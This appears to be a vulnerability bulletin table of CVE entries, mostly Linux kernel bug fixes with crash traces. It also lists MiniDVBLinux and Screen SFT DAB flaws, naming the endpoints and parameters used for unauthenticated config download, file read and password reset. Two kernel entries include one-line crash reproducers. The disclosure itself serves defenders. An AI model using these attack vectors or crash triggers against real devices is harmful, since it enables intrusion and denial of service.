| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Handle lock during peer_id find ath12k_peer_find_by_id() requires that the caller hold the ab->base_lock. Currently the WBM error path does not hold the lock and calling that function, leads to the following lockdep_assert() in QCN9274: [105162.160893] ------------[ cut here ]------------ [105162.160916] WARNING: CPU: 3 PID: 0 at drivers/net/wireless/ath/ath12k/peer.c:71 ath12k_peer_find_by_id+0x52/0x60 [ath12k] [105162.160933] Modules linked in: ath12k(O) qrtr_mhi qrtr mac80211 cfg80211 mhi qmi_helpers libarc4 nvme nvme_core [last unloaded: ath12k(O)] [105162.160967] CPU: 3 PID: 0 Comm: swapper/3 Tainted: G W O 6.1.0-rc2+ #3 [105162.160972] Hardware name: Intel(R) Client Systems NUC8i7HVK/NUC8i7HVB, BIOS HNKBLi70.86A.0056.2019.0506.1527 05/06/2019 [105162.160977] RIP: 0010:ath12k_peer_find_by_id+0x52/0x60 [ath12k] [105162.160990] Code: 07 eb 0f 39 68 24 74 0a 48 8b 00 48 39 f8 75 f3 31 c0 5b 5d c3 48 8d bf b0 f2 00 00 be ff ff ff ff e8 22 20 c4 e2 85 c0 75 bf <0f> 0b eb bb 66 2e 0f 1f 84 00 00 00 00 00 41 54 4c 8d a7 98 f2 00 [105162.160996] RSP: 0018:ffffa223001acc60 EFLAGS: 00010246 [105162.161003] RAX: 0000000000000000 RBX: ffff9f0573940000 RCX: 0000000000000000 [105162.161008] RDX: 0000000000000001 RSI: ffffffffa3951c8e RDI: ffffffffa39a96d7 [105162.161013] RBP: 000000000000000a R08: 0000000000000000 R09: 0000000000000000 [105162.161017] R10: ffffa223001acb40 R11: ffffffffa3d57c60 R12: ffff9f057394f2e0 [105162.161022] R13: ffff9f0573940000 R14: ffff9f04ecd659c0 R15: ffff9f04d5a9b040 [105162.161026] FS: 0000000000000000(0000) GS:ffff9f0575600000(0000) knlGS:0000000000000000 [105162.161031] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [105162.161036] CR2: 00001d5c8277a008 CR3: 00000001e6224006 CR4: 00000000003706e0 [105162.161041] Call Trace: [105162.161046] <IRQ> [105162.161051] ath12k_dp_rx_process_wbm_err+0x6da/0xaf0 [ath12k] [105162.161072] ? ath12k_dp_rx_process_err+0x80e/0x15a0 [ath12k] [105162.161084] ? __lock_acquire+0x4ca/0x1a60 [105162.161104] ath12k_dp_service_srng+0x263/0x310 [ath12k] [105162.161120] ath12k_pci_ext_grp_napi_poll+0x1c/0x70 [ath12k] [105162.161133] __napi_poll+0x22/0x260 [105162.161141] net_rx_action+0x2f8/0x380 [105162.161153] __do_softirq+0xd0/0x4c9 [105162.161162] irq_exit_rcu+0x88/0xe0 [105162.161169] common_interrupt+0xa5/0xc0 [105162.161174] </IRQ> [105162.161179] <TASK> [105162.161184] asm_common_interrupt+0x22/0x40 Handle spin lock/unlock in WBM error path to hold the necessary lock expected by ath12k_peer_find_by_id(). Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0-03171-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2023-53764 | https://git.kernel.org/stable/c/9faf7c696610a348ca94a224d55c946b19b3279d https://git.kernel.org/stable/c/95a389e2ff3212d866cc51c77d682d2934074eb8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm cache: free background tracker's queued work in btracker_destroy Otherwise the kernel can BUG with: [ 2245.426978] ============================================================================= [ 2245.435155] BUG bt_work (Tainted: G B W ): Objects remaining in bt_work on __kmem_cache_shutdown() [ 2245.445233] ----------------------------------------------------------------------------- [ 2245.445233] [ 2245.454879] Slab 0x00000000b0ce2b30 objects=64 used=2 fp=0x000000000a3c6a4e flags=0x17ffffc0000200(slab|node=0|zone=2|lastcpupid=0x1fffff) [ 2245.467300] CPU: 7 PID: 10805 Comm: lvm Kdump: loaded Tainted: G B W 6.0.0-rc2 #19 [ 2245.476078] Hardware name: Dell Inc. PowerEdge R7525/0590KW, BIOS 2.5.6 10/06/2021 [ 2245.483646] Call Trace: [ 2245.486100] <TASK> [ 2245.488206] dump_stack_lvl+0x34/0x48 [ 2245.491878] slab_err+0x95/0xcd [ 2245.495028] __kmem_cache_shutdown.cold+0x31/0x136 [ 2245.499821] kmem_cache_destroy+0x49/0x130 [ 2245.503928] btracker_destroy+0x12/0x20 [dm_cache] [ 2245.508728] smq_destroy+0x15/0x60 [dm_cache_smq] [ 2245.513435] dm_cache_policy_destroy+0x12/0x20 [dm_cache] [ 2245.518834] destroy+0xc0/0x110 [dm_cache] [ 2245.522933] dm_table_destroy+0x5c/0x120 [dm_mod] [ 2245.527649] __dm_destroy+0x10e/0x1c0 [dm_mod] [ 2245.532102] dev_remove+0x117/0x190 [dm_mod] [ 2245.536384] ctl_ioctl+0x1a2/0x290 [dm_mod] [ 2245.540579] dm_ctl_ioctl+0xa/0x20 [dm_mod] [ 2245.544773] __x64_sys_ioctl+0x8a/0xc0 [ 2245.548524] do_syscall_64+0x5c/0x90 [ 2245.552104] ? syscall_exit_to_user_mode+0x12/0x30 [ 2245.556897] ? do_syscall_64+0x69/0x90 [ 2245.560648] ? do_syscall_64+0x69/0x90 [ 2245.564394] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 2245.569447] RIP: 0033:0x7fe52583ec6b ... [ 2245.646771] ------------[ cut here ]------------ [ 2245.651395] kmem_cache_destroy bt_work: Slab cache still has objects when called from btracker_destroy+0x12/0x20 [dm_cache] [ 2245.651408] WARNING: CPU: 7 PID: 10805 at mm/slab_common.c:478 kmem_cache_destroy+0x128/0x130 Found using: lvm2-testsuite --only "cache-single-split.sh" Ben bisected and found that commit 0495e337b703 ("mm/slab_common: Deleting kobject in kmem_cache_destroy() without holding slab_mutex/cpu_hotplug_lock") first exposed dm-cache's incomplete cleanup of its background tracker work objects. | 2025-12-08 | not yet calculated | CVE-2023-53765 | https://git.kernel.org/stable/c/673a3af21d5e3ed769f3eaed0c888244290a3506 https://git.kernel.org/stable/c/ed56ad5cacb7a3aeb611494d5d66e2399d2bfecc https://git.kernel.org/stable/c/95ab80a8a0fef2ce0cc494a306dd283948066ce7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: FS: JFS: Check for read-only mounted filesystem in txBegin This patch adds a check for a read-only mounted filesystem in txBegin before starting a transaction, potentially saving us from a NULL pointer deref. | 2025-12-08 | not yet calculated | CVE-2023-53766 | https://git.kernel.org/stable/c/a88efca805bea93cea9187dfd00835aa7093bf1b https://git.kernel.org/stable/c/97c1f26e4d4af55e8584e4646dd5c5fa7baf62c7 https://git.kernel.org/stable/c/2a8807f9f511c64de0c7cc9900a1683e3d72a3e5 https://git.kernel.org/stable/c/5c094ca994824e038b6a97835ded4e5d1d808504 https://git.kernel.org/stable/c/2febd5f81e4bfba61d9f374dcca628aff374cc56 https://git.kernel.org/stable/c/aa7cdf487ab3fa47284daaccc3d7d5de01c6a84c https://git.kernel.org/stable/c/b0ed8ed0428ee96092da6fefa5cfacbe4abed701 https://git.kernel.org/stable/c/95e2b352c03b0a86c5717ba1d24ea20969abcacc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix memory leak in ath12k_qmi_driver_event_work() Currently the buffer pointed to by event is not freed in case the ATH12K_FLAG_UNREGISTERING bit is set; this causes a memory leak. Add a goto skip instead of return, to ensure event and all the list entries are freed properly. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2023-53767 | https://git.kernel.org/stable/c/a87f59041a7f77b4bdab05cea60ac6adc69dc5d2 https://git.kernel.org/stable/c/960412bee0ea75f6b3c2dca4a3535795ee84c47a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regmap-irq: Fix out-of-bounds access when allocating config buffers When allocating the 2D array for handling IRQ type registers in regmap_add_irq_chip_fwnode(), the intent is to allocate a matrix with num_config_bases rows and num_config_regs columns. This is currently handled by allocating a buffer to hold a pointer for each row (i.e. num_config_bases). After that, the logic attempts to allocate the memory required to hold the register configuration for each row. However, instead of doing this allocation for each row (i.e. num_config_bases allocations), the logic erroneously does this allocation num_config_regs number of times. This scenario can lead to out-of-bounds accesses when num_config_regs is greater than num_config_bases. Fix this by updating the terminating condition of the loop that allocates the memory for holding the register configuration to allocate memory only for each row in the matrix. Amit Pundir reported a crash that was occurring on his db845c device due to memory corruption (see "Closes" tag for Amit's report). The KASAN report below helped narrow it down to this issue: [ 14.033877][ T1] ================================================================== [ 14.042507][ T1] BUG: KASAN: invalid-access in regmap_add_irq_chip_fwnode+0x594/0x1364 [ 14.050796][ T1] Write of size 8 at addr 06ffff8081021850 by task init/1 [ 14.242004][ T1] The buggy address belongs to the object at ffffff8081021850 [ 14.242004][ T1] which belongs to the cache kmalloc-8 of size 8 [ 14.255669][ T1] The buggy address is located 0 bytes inside of [ 14.255669][ T1] 8-byte region [ffffff8081021850, ffffff8081021858) | 2025-12-08 | not yet calculated | CVE-2023-53768 | https://git.kernel.org/stable/c/b1a726ad33e585e3d9fa70712df31ae105e4532c https://git.kernel.org/stable/c/6e7b2337ecd028bd888a1a0be4115b8a88faf838 https://git.kernel.org/stable/c/963b54df82b6d6206d7def273390bf3f7af558e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virt/coco/sev-guest: Double-buffer messages The encryption algorithms read and write directly to shared unencrypted memory, which may leak information as well as permit the host to tamper with the message integrity. Instead, copy whole messages in or out as needed before doing any computation on them. | 2025-12-08 | not yet calculated | CVE-2023-53769 | https://git.kernel.org/stable/c/577a64725bfd77645986168e953d405067ee565b https://git.kernel.org/stable/c/c27dafc4aa50a29ec927b3aa84ac7b430071f682 https://git.kernel.org/stable/c/4b69c63f716cfda38e1210e65b68f67f6cee2ddf https://git.kernel.org/stable/c/965006103a14703cc42043bbf9b5e0cdf7a468ad |
| MiniDVBLinux--MiniDVBLinux(TM) Distribution (MLD) | MiniDVBLinux 5.4 contains an unauthenticated configuration download vulnerability that allows remote attackers to access sensitive system configuration files through a direct object reference. Attackers can exploit the backup download endpoint by sending a GET request with 'action=getconfig' to retrieve a complete system configuration archive containing sensitive credentials. | 2025-12-09 | not yet calculated | CVE-2023-53770 | ExploitDB-51091 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5713) VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Configuration Download via Backup Endpoint |
| MiniDVBLinux--MiniDVBLinux Change Root Password PoC | MiniDVBLinux 5.4 contains an authentication bypass vulnerability that allows remote attackers to change the root password without authentication. Attackers can send crafted POST requests to the system setup endpoint with modified SYSTEM_PASSWORD parameters to reset root credentials. | 2025-12-09 | not yet calculated | CVE-2023-53771 | ExploitDB-51094 Zero Science Lab Disclosure (ZSL-2022-5715) Official Product Homepage VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Root Password Change via System Setup |
| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains an arbitrary file disclosure vulnerability that allows attackers to read sensitive system files through the 'file' GET parameter. Attackers can exploit the about page by supplying file paths to disclose arbitrary file contents on the affected device. | 2025-12-09 | not yet calculated | CVE-2023-53772 | ExploitDB-51097 MiniDVBLinux Product Homepage Zero Science Lab Disclosure (ZSL-2022-5719) VulnCheck Advisory: MiniDVBLinux 5.4 Arbitrary File Read Vulnerability via About Page |
| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains an unauthenticated vulnerability in the tv_action.sh script that allows remote attackers to generate live stream snapshots through the Simple VDR Protocol. Attackers can request /tpl/tv_action.sh to create and retrieve a live TV screenshot stored in /var/www/images/tv.jpg without authentication. | 2025-12-09 | not yet calculated | CVE-2023-53773 | ExploitDB-51095 MiniDVBLinux Product Homepage Zero Science Lab Disclosure (ZSL-2022-5716) VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Live Stream Disclosure via tv_action.sh |
| MiniDVBLinux--Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit | MiniDVBLinux 5.4 contains a remote code execution vulnerability in the SVDRP protocol that allows remote attackers to send commands to manipulate TV systems. Attackers can send crafted SVDRP commands through the svdrpsend.sh script to execute messages and potentially control the video disk recorder remotely. | 2025-12-09 | not yet calculated | CVE-2023-53774 | ExploitDB-51093 SVDRP Documentation Zero Science Lab Disclosure (ZSL-2022-5714) MiniDVBLinux Product Homepage VulnCheck Advisory: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol Remote Code Execution |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change user passwords by exploiting weak session management controls. Attackers can reuse IP-bound session identifiers to issue unauthorized requests to the userManager API and modify user credentials without proper authentication. | 2025-12-10 | not yet calculated | CVE-2023-53775 | ExploitDB-51456 Screen Product Homepage DB Broadcast Official Product Page DB Broadcast Website Zero Science Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Session Management Weakness |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to exploit weak session management by reusing IP-bound session identifiers. Attackers can issue unauthorized requests to the device management API by leveraging the session binding mechanism to perform critical operations on the transmitter. | 2025-12-10 | not yet calculated | CVE-2023-53776 | ExploitDB-51459 Product Homepage Vendor Homepage Product Homepage Vendor Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Session Management Weakness |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: kill hooked chains to avoid loops on deduplicated compressed images After heavily stressing EROFS with several images which include a hand-crafted image of repeated patterns for more than 46 days, I found two chains could be linked with each other almost simultaneously and form a loop so that the entire loop won't be submitted. As a consequence, the corresponding file pages will remain locked forever. It can be _only_ observed on data-deduplicated compressed images. For example, consider two chains with five pclusters in total: Chain 1: 2->3->4->5 -- The tail pcluster is 5; Chain 2: 5->1->2 -- The tail pcluster is 2. Chain 2 could link to Chain 1 with pcluster 5; and Chain 1 could link to Chain 2 at the same time with pcluster 2. Since hooked chains are all linked locklessly now, I have no idea how to simply avoid the race. Instead, let's avoid hooked chains completely until I could work out a proper way to fix this and end users finally tell us that it's needed to add it back. Actually, this optimization can be found with multi-threaded workloads (especially even more often on deduplicated compressed images), yet I'm not sure about the overall system impacts of not having this compared with implementation complexity. | 2025-12-09 | not yet calculated | CVE-2023-53777 | https://git.kernel.org/stable/c/d3b39ea24835ac03da1a30f93ae7c05d55a40191 https://git.kernel.org/stable/c/b5b0d52f00e4bacb0ebdf47cd7016b0485fffad2 https://git.kernel.org/stable/c/10c2b98a40d9044a3e97f4697ca6213bad7e19c2 https://git.kernel.org/stable/c/967c28b23f6c89bb8eef6a046ea88afe0d7c1029 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/qaic: Clean up integer overflow checking in map_user_pages() The encode_dma() function has some validation on in_trans->size but it would be more clear to move those checks to find_and_map_user_pages(). The encode_dma() had two checks: if (in_trans->addr + in_trans->size < in_trans->addr || !in_trans->size) return -EINVAL; The in_trans->addr variable is the starting address. The in_trans->size variable is the total size of the transfer. The transfer can occur in parts and the resources->xferred_dma_size tracks how many bytes we have already transferred. This patch introduces a new variable "remaining" which represents the amount we want to transfer (in_trans->size) minus the amount we have already transferred (resources->xferred_dma_size). I have modified the check for if in_trans->size is zero to instead check if in_trans->size is less than resources->xferred_dma_size. If we have already transferred more bytes than in_trans->size then there are negative bytes remaining which doesn't make sense. If there are zero bytes remaining to be copied, just return success. The check in encode_dma() checked that "addr + size" could not overflow and barring a driver bug that should work, but it's easier to check if we do this in parts. First check that "in_trans->addr + resources->xferred_dma_size" is safe. Then check that "xfer_start_addr + remaining" is safe. My final concern was that we are dealing with u64 values but on 32bit systems the kmalloc() function will truncate the sizes to 32 bits. So I calculated "total = in_trans->size + offset_in_page(xfer_start_addr);" and returned -EINVAL if it were >= SIZE_MAX. This will not affect 64bit systems. | 2025-12-09 | not yet calculated | CVE-2023-53778 | https://git.kernel.org/stable/c/d410a96e5cb8c1ec7049c83f2edcd8bbfaf5d9b3 https://git.kernel.org/stable/c/96d3c1cadedb6ae2e8965e19cd12caa244afbd9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: dln2: Fix memory leak in dln2_probe() When dln2_setup_rx_urbs() in dln2_probe() fails, error out_free forgets to call usb_put_dev() to decrease the refcount of dln2->usb_dev. Fix this by adding usb_put_dev() in the error handling code of dln2_probe(). | 2025-12-09 | not yet calculated | CVE-2023-53779 | https://git.kernel.org/stable/c/aa5a8673d71124e7dcdd497ec2accebc15bd6ca3 https://git.kernel.org/stable/c/71fa6f134d13822a5dd906327de04aad8e903e49 https://git.kernel.org/stable/c/1e453cb55014367a84655203c31d57dfa87e005e https://git.kernel.org/stable/c/6a1a72a8cfdad6911a7167405b63545ad781fbe2 https://git.kernel.org/stable/c/1fa3fb4f70184254af437ccd59fd1c091a90d518 https://git.kernel.org/stable/c/77f43c014a770c4dcbdeed7cda6884c29382eb0f https://git.kernel.org/stable/c/fa045c911f0bfc0305c71618ab5630153faf86a4 https://git.kernel.org/stable/c/96da8f148396329ba769246cb8ceaa35f1ddfc48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix FCLK pstate change underflow [Why] Currently we set FCLK p-state change watermark calculated based on dummy p-state latency when UCLK p-state is not supported [How] Calculate FCLK p-state change watermark based on FCLK pstate change latency in case UCLK p-state is not supported | 2025-12-09 | not yet calculated | CVE-2023-53780 | https://git.kernel.org/stable/c/4bdfa48d74649898468a0bf5c8b8a48dded77b4a https://git.kernel.org/stable/c/6853d56dba56d1c24db403ff3885c71e18d572c4 https://git.kernel.org/stable/c/972243f973eb0821084e5833d5f7f4ed025f42da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smc: Fix use-after-free in tcp_write_timer_handler(). With Eric's ref tracker, syzbot finally found a repro for use-after-free in tcp_write_timer_handler() by kernel TCP sockets. [0] If SMC creates a kernel socket in __smc_create(), the kernel socket is supposed to be freed in smc_clcsock_release() by calling sock_release() when we close() the parent SMC socket. However, at the end of smc_clcsock_release(), the kernel socket's sk_state might not be TCP_CLOSE. This means that we have not called inet_csk_destroy_sock() in __tcp_close() and have not stopped the TCP timers. The kernel socket's TCP timers can be fired later, so we need to hold a refcnt for net as we do for MPTCP subflows in mptcp_subflow_create_socket(). [0]: leaked reference. sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108) inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244) __sock_create (net/socket.c:1546) smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284) __sock_create (net/socket.c:1546) __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661) __x64_sys_socket (net/socket.c:1672) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) ================================================================== BUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594) Read of size 1 at addr ffff888052b65e0d by task syzrepro/18091 CPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014 Call Trace: <IRQ> dump_stack_lvl (lib/dump_stack.c:107) print_report (mm/kasan/report.c:320 mm/kasan/report.c:430) kasan_report (mm/kasan/report.c:538) tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594) tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643) call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701) __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022) run_timer_softirq (kernel/time/timer.c:2037) __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572) __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650) irq_exit_rcu (kernel/softirq.c:664) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14)) </IRQ> | 2025-12-09 | not yet calculated | CVE-2023-53781 | https://git.kernel.org/stable/c/1cc41c8acfc1ee30b4868559058db97fa44b0137 https://git.kernel.org/stable/c/9744d2bf19762703704ecba885b7ac282c02eacf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dccp: Fix out of bounds access in DCCP error handler There was a previous attempt to fix an out-of-bounds access in the DCCP error handlers, but that fix assumed that the error handlers only want to access the first 8 bytes of the DCCP header. Actually, they also look at the DCCP sequence number, which is stored beyond 8 bytes, so an explicit pskb_may_pull() is required. | 2025-12-09 | not yet calculated | CVE-2023-53782 | https://git.kernel.org/stable/c/3533e10272555c422a7d51ebc0ce8c483429f7f2 https://git.kernel.org/stable/c/177212bf6dc1ff2d13d0409cddc5c9e81feec63d https://git.kernel.org/stable/c/7a7dd70cb954d3efa706a429687ded88c02496fa https://git.kernel.org/stable/c/4b8a938e329ae4eb54b73b0c87b5170607b038a8 https://git.kernel.org/stable/c/6ecf09699eb1554299aa1e7fd13e9e80f656c2f9 https://git.kernel.org/stable/c/f8a7f10a1dccf9868ff09342a73dce27501b86df https://git.kernel.org/stable/c/d8171411a661253e6271fa10b65b46daf1b6471c https://git.kernel.org/stable/c/ec620c34f5fa5d055f9f6136a387755db6157712 https://git.kernel.org/stable/c/977ad86c2a1bcaf58f01ab98df5cc145083c489c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-iocost: fix divide by 0 error in calc_lcoefs() echo max of u64 to cost.model can cause divide by 0 error. # echo 8:0 rbps=18446744073709551615 > /sys/fs/cgroup/io.cost.model divide error: 0000 [#1] PREEMPT SMP RIP: 0010:calc_lcoefs+0x4c/0xc0 Call Trace: <TASK> ioc_refresh_params+0x2b3/0x4f0 ioc_cost_model_write+0x3cb/0x4c0 ? _copy_from_iter+0x6d/0x6c0 ? kernfs_fop_write_iter+0xfc/0x270 cgroup_file_write+0xa0/0x200 kernfs_fop_write_iter+0x17d/0x270 vfs_write+0x414/0x620 ksys_write+0x73/0x160 __x64_sys_write+0x1e/0x30 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd calc_lcoefs() uses the input value of cost.model in DIV_ROUND_UP_ULL, overflow would happen if bps plus IOC_PAGE_SIZE is greater than ULLONG_MAX, it can cause divide by 0 error. Fix the problem by setting basecost | 2025-12-09 | not yet calculated | CVE-2023-53783 | https://git.kernel.org/stable/c/9e8bf9f95f7a299fa9ea45b678d001806ad5e12c https://git.kernel.org/stable/c/6e291810fe83a384700eb24a1f714966391ed562 https://git.kernel.org/stable/c/3538ade9d8c2ba41088e395de916f2599fadba8f https://git.kernel.org/stable/c/bf8eb1fd6110871e6232e8e7efe399276ef7e6f6 https://git.kernel.org/stable/c/b96d7b4a9745fbd0c8384608ceb1f50415e862fa https://git.kernel.org/stable/c/984af1e66b4126cf145153661cc24c213e2ec231 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: bridge: dw_hdmi: fix connector access for scdc Commit 5d844091f237 ("drm/scdc-helper: Pimp SCDC debugs") changed the scdc interface to pick up an i2c adapter from a connector instead. However, in the case of dw-hdmi, the wrong connector was being used to pass i2c adapter information, since dw-hdmi's embedded connector structure is only populated when the bridge attachment callback explicitly asks for it. drm-meson is handling connector creation, so this won't happen, leading to a NULL pointer dereference. Fix it by having scdc functions access dw-hdmi's current connector pointer instead, which is assigned during the bridge enablement stage. [narmstrong: moved Fixes tag before first S-o-b and added Reported-by tag] | 2025-12-09 | not yet calculated | CVE-2023-53784 | https://git.kernel.org/stable/c/552f79aa9e801ed4f74d6b3221af78042ba4f235 https://git.kernel.org/stable/c/98703e4e061fb8715c7613cd227e32cdfd136b23 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mt76: mt7921: don't assume adequate headroom for SDIO headers mt7921_usb_sdio_tx_prepare_skb() calls mt7921_usb_sdio_write_txwi() and mt7921_skb_add_usb_sdio_hdr(), both of which blindly assume that adequate headroom will be available in the passed skb. This assumption typically is satisfied when the skb was allocated in the net core for transmission via the mt7921 netdev (although even that is only an optimization and is not strictly guaranteed), but the assumption is sometimes not satisfied when the skb originated in the receive path of another netdev and was passed through to the mt7921, such as by the bridge layer. Blindly prepending bytes to an skb is always wrong. This commit introduces a call to skb_cow_head() before the call to mt7921_usb_sdio_write_txwi() in mt7921_usb_sdio_tx_prepare_skb() to ensure that at least MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE bytes can be pushed onto the skb. Without this fix, I can trivially cause kernel panics by bridging an MT7921AU-based USB 802.11ax interface with an Ethernet interface on an Intel Atom-based x86 system using its onboard RTL8169 PCI Ethernet adapter and also on an ARM-based Raspberry Pi 1 using its onboard SMSC9512 USB Ethernet adapter. Note that the panics do not occur in every system configuration, as they occur only if the receiving netdev leaves less headroom in its received skbs than the mt7921 needs for its SDIO headers. Here is an example stack trace of this panic on Raspberry Pi OS Lite 2023-02-21 running kernel 6.1.24+ [1]: skb_panic from skb_push+0x44/0x48 skb_push from mt7921_usb_sdio_tx_prepare_skb+0xd4/0x190 [mt7921_common] mt7921_usb_sdio_tx_prepare_skb [mt7921_common] from mt76u_tx_queue_skb+0x94/0x1d0 [mt76_usb] mt76u_tx_queue_skb [mt76_usb] from __mt76_tx_queue_skb+0x4c/0xc8 [mt76] __mt76_tx_queue_skb [mt76] from mt76_txq_schedule.part.0+0x13c/0x398 [mt76] mt76_txq_schedule.part.0 [mt76] from mt76_txq_schedule_all+0x24/0x30 [mt76] mt76_txq_schedule_all [mt76] from mt7921_tx_worker+0x58/0xf4 [mt7921_common] mt7921_tx_worker [mt7921_common] from __mt76_worker_fn+0x9c/0xec [mt76] __mt76_worker_fn [mt76] from kthread+0xbc/0xe0 kthread from ret_from_fork+0x14/0x34 After this fix, bridging the mt7921 interface works fine on both of my previously problematic systems. [1] https://github.com/raspberrypi/firmware/tree/5c276f55a4b21345cd4d6200a504ee991851ff7a | 2025-12-09 | not yet calculated | CVE-2023-53785 | https://git.kernel.org/stable/c/5c8bbb79c7cbca65534badf360f3b1145759c7bc https://git.kernel.org/stable/c/414c0c04703423b78bc9dea1aa6493334dc61f6e https://git.kernel.org/stable/c/98c4d0abf5c478db1ad126ff0c187dbb84c0803c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm flakey: fix a crash with invalid table line This command will crash with NULL pointer dereference: dmsetup create flakey --table \ "0 `blockdev --getsize /dev/ram0` flakey /dev/ram0 0 0 1 2 corrupt_bio_byte 512" Fix the crash by checking if arg_name is non-NULL before comparing it. | 2025-12-09 | not yet calculated | CVE-2023-53786 | https://git.kernel.org/stable/c/f95cb1526669ccdf7eb12eefd57a893953e3595f https://git.kernel.org/stable/c/12849ed107c0b2869fb775c81208050899006f07 https://git.kernel.org/stable/c/337b7af273562b73c46ef77a724604ad139ca762 https://git.kernel.org/stable/c/a1e3fffe02e05c05357af91364ac0fc1ed425b5b https://git.kernel.org/stable/c/f76fcb9d43ec014ac4a1bb983768696d5b032df9 https://git.kernel.org/stable/c/cb874a190f3f7c3c3fa5b979bee7a3b8cc3a19cc https://git.kernel.org/stable/c/83b4e3d878ea6be9aec1d5a1ab177c766c64d1a0 https://git.kernel.org/stable/c/8258d84a7917aeece773716518deadb7ad776cb7 https://git.kernel.org/stable/c/98dba02d9a93eec11bffbb93c7c51624290702d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: da9063: fix null pointer deref with partial DT config When some of the da9063 regulators do not have corresponding DT nodes a null pointer dereference occurs on boot because such regulators have no init_data causing the pointers calculated in da9063_check_xvp_constraints() to be invalid. Do not dereference them in this case. | 2025-12-09 | not yet calculated | CVE-2023-53787 | https://git.kernel.org/stable/c/04a025b17d83d07924e5e32508c72536ab8f42d9 https://git.kernel.org/stable/c/98e2dd5f7a8be5cb2501a897e96910393a49f0ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda/ca0132: fixup buffer overrun at tuning_ctl_set() tuning_ctl_set() might have buffer overrun at (X) if it didn't break from loop by matching (A). static int tuning_ctl_set(...) { for (i = 0; i < TUNING_CTLS_COUNT; i++) (A) if (nid == ca0132_tuning_ctls[i].nid) break; snd_hda_power_up(...); (X) dspio_set_param(..., ca0132_tuning_ctls[i].mid, ...); snd_hda_power_down(...); ^ return 1; } We will get below error by cppcheck sound/pci/hda/patch_ca0132.c:4229:2: note: After for loop, i has value 12 for (i = 0; i < TUNING_CTLS_COUNT; i++) ^ sound/pci/hda/patch_ca0132.c:4234:43: note: Array index out of bounds dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20, ^ This patch cares non match case. | 2025-12-09 | not yet calculated | CVE-2023-53788 | https://git.kernel.org/stable/c/ff5e8b49348f6a550c136b74efaf8b3c1d3ceaea https://git.kernel.org/stable/c/3590498117a11aa1f92a97e8a04d95320e347ebd https://git.kernel.org/stable/c/7f12f99b8017ad5ed5aff4b0aefe3bb7bbdf8a99 https://git.kernel.org/stable/c/baef27176ea5fdc7ad0947e2dc7733855e35db71 https://git.kernel.org/stable/c/d23f65f08247068576a01e28b297e995b7dc3965 